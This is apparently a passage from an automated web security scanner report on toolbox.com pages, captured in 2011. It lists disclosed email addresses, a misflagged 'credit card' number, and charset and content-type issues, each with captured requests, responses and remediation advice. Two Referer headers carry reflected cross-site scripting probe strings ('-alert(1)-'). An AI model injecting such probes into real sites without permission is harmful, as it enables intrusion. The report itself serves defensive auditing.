<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Contact Too ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]...
GET /it/advertising/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 26971 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Advertis ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]...
GET /news/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21896 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ugckar45ukzeih55dzbcsf45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:43 GMT Connection: close
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
id@Ls.tc
Request
GET /BUILD_1414/js/omniture.js HTTP/1.1 Host: icdn.toolbox.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday/?c2483'-alert(1)-'56ce208cc66=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 200 OK x-amz-id-2: bFRqQzStmIwdHIGWI95oqP/weROfycbuR1jmUMS//iqwO5JVs+3YrFTcOU1wtayA x-amz-request-id: 88234B988CB19770 Date: Wed, 19 Jan 2011 17:55:12 GMT Last-Modified: Wed, 19 Jan 2011 17:44:22 GMT ETag: "09f0075d94254dd4d6983c8468632401" Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 19799 Server: AmazonS3 Age: 71650 X-Cache: Hit from cloudfront X-Amz-Cf-Id: ad8db042a6a2d059b762895e3d18e23e971323af293671e34a7a04b9cc210859d948fc5fbc6f01b8 Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 1498073e9b9d776e833364cb193e1819.cloudfront.net:11180 (CloudFront) Connection: keep-alive
var s=s_gi(s_account);s.currencyCode="USD";s.trackDownloadLinks=true;s.trackExternalLinks=true;s.trackInlineStats=true;s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,wmv,pdf,doc,docx,xls,xlsx,pp ...[SNIP]... `j+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.flush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;s.b= ...[SNIP]...
The following email address was disclosed in the response:
id@Ls.tc
Request
GET /BUILD_1414/js/z.omniture.js HTTP/1.1 Host: icdn.toolbox.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK x-amz-id-2: J2JsUcUNvC5TGCeHtwe/wn8PFYV8oCruVhNeOXB3jDA3GIIQa8jWVA3dV/EaeN71 x-amz-request-id: 3BD3627D3016C172 Date: Wed, 26 Jan 2011 00:45:27 GMT Cache-Control: max-age=315360000 Expires: Thu, 31 Dec 2037 23:55:55 GMT Last-Modified: Wed, 19 Jan 2011 17:44:22 GMT ETag: "6271248ad94490a7cbd4afc6c71b520b" Accept-Ranges: bytes Content-Type: application/x-javascript Server: AmazonS3 Age: 50643 X-Cache: Hit from cloudfront X-Amz-Cf-Id: 7fa993494def2f0624604fc157383e4ecadc91cc733ee6d74d7b3c73bc59d6d8de04cc3af6208346 Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 1498073e9b9d776e833364cb193e1819.cloudfront.net:11180 (CloudFront) Connection: keep-alive Content-Length: 19799
var s=s_gi(s_account);s.currencyCode="USD";s.trackDownloadLinks=true;s.trackExternalLinks=true;s.trackInlineStats=true;s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,wmv,pdf,doc,docx,xls,xlsx,pp ...[SNIP]... `j+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.flush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;s.b= ...[SNIP]...
The following email address was disclosed in the response:
JobCenter@Toolbox.com
Request
GET /jobs/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 40888 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:48 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Jobs </tit ...[SNIP]... <li>Save money with volume discounts for multiple job postings. Please call 888.922.8302 ext. 3 or e-mail JobCenter@Toolbox.com for more information.</li> ...[SNIP]...
The following email address was disclosed in the response:
me@email.com
Request
GET / HTTP/1.1 Host: sethgodin.typepad.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email address was disclosed in the response:
sales@marchex.com
Request
GET /signupgroup/Welcome_IB.aspx HTTP/1.1 Host: www.industrybrains.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 26 Jan 2011 14:57:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 27815
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <!-- $Id: welcome_ib.aspx,v 1.3.8.1 2009-07-29 02:45:22 chris Exp $ --> <html> <head> <title>Marchex Adhere, LLC - Premium Performa ...[SNIP]... <a href="mailto:sales@marchex.com"> ...[SNIP]...
The following email address was disclosed in the response:
legaldept@executiveboard.com
Request
GET /PrivacyPolicy.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35183 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ooszoo554q0sbqbgcenmvfuw; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox.com ...[SNIP]... al questions or concerns about this Policy, please feel free to contact us at Chief Compliance Officer, The Corporate Executive Board, 1919 North Lynn Street, Arlington, Virginia 22209; or email us at legaldept@executiveboard.com</li> ...[SNIP]...
The following email address was disclosed in the response:
legaldept@executiveboard.com
Request
GET /TermsofUse.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46350 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3xmjev553fihez45e2oo2ivi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox.com ...[SNIP]... <p>Please contact legaldept@executiveboard.com, using the subject line ...Toolbox.com Terms of Use Question... if You have any questions or comments about the Terms, or to report user conduct violating the Terms.</p> ...[SNIP]...
The following email address was disclosed in the response:
advertising@toolbox.com
Request
GET /it/advertising/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 26971 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Advertis ...[SNIP]... <a href="mailto:advertising@toolbox.com">advertising@toolbox.com</a> ...[SNIP]... <a href="mailto:advertising@toolbox.com">advertising@toolbox.com</a> ...[SNIP]...
The following credit card number was disclosed in the response:
4941944497111040
Issue background
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
Request
GET /toolboxdotcom HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:29 GMT Server: hi Status: 200 OK X-Transaction: 1296053789-52552-6574 ETag: "cba3bfc96bf68c050adb0ae164dc8175" Last-Modified: Wed, 26 Jan 2011 14:56:29 GMT X-Runtime: 0.01600 Content-Type: text/html; charset=utf-8 Content-Length: 51936 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053788039947; path=/; expires=Wed, 02-Feb-11 14:56:28 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY4MmYzNTRlZWE2MzBkYjZlMzAxMGM2YmExZmIzMTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbmHTwi0B--5f068f484769ee483f9eaf437005d73e90b46f16; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... <a href="http://twitter.com/B2Bspecialist/status/4941944497111040"> ...[SNIP]...
14. HTML does not specify charset
There are 9 instances of this issue:
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /BUILD_1414/ HTTP/1.1
Host: cdn.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D;
Request
GET /blogs/ppmtoday/categories/future+states/2379 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close
Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Request
GET /blogs/ppmtoday/categories/recommended+reading/1191 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close
Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Request
GET /blogs/ppmtoday/categories/thinking+out+loud/2765 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:16 GMT
Connection: close
Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Request
GET /blogs/ppmtoday/categories/war+stories/1192 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:17 GMT
Connection: close
Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Request
GET /blogs/ppmtoday/categories/white+papers/1193 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:17 GMT
Connection: close
Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Request
GET /click HTTP/1.1
Host: links.industrybrains.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 400 Bad Request
Connection: close
Date: Wed, 26 Jan 2011 14:55:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 26 Jan 2011 14:55:40 GMT
Content-Length: 77
Request
GET /cringely/pulpit/ HTTP/1.1
Host: www.pbs.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:57:09 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=a407b02ae7db3726c0e6bb20994d70e7; path=/; domain=.pbs.org
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33427
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]...
The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:
UTF-8
iso
Issue background
Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /products/desktop-central/index.html HTTP/1.1
Host: www.manageengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:57:01 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 13:46:19 GMT
ETag: "16060-d315c0c0"
Accept-Ranges: bytes
Content-Length: 90208
Cache-Control: max-age=604800
Expires: Wed, 02 Feb 2011 14:57:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
The response contains the following Content-type statement:
Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /api/ctatools/CreateCookie.aspx HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 180
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:48:11 GMT
Connection: close
Invalid "cta" argument. Correct values are any on of the following: "ask-a-q", "connect-to-blog", "general-value", "invite-peers", "join", "join-group", "blog-start"<!-- No CTA -->
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /blogs/ppmtoday/categories/future+states/2379 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close
Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /blogs/ppmtoday/categories/recommended+reading/1191 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close
Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /blogs/ppmtoday/categories/thinking+out+loud/2765 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:16 GMT
Connection: close
Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /blogs/ppmtoday/categories/war+stories/1192 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:17 GMT
Connection: close
Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /blogs/ppmtoday/categories/white+papers/1193 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:17 GMT
Connection: close
Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.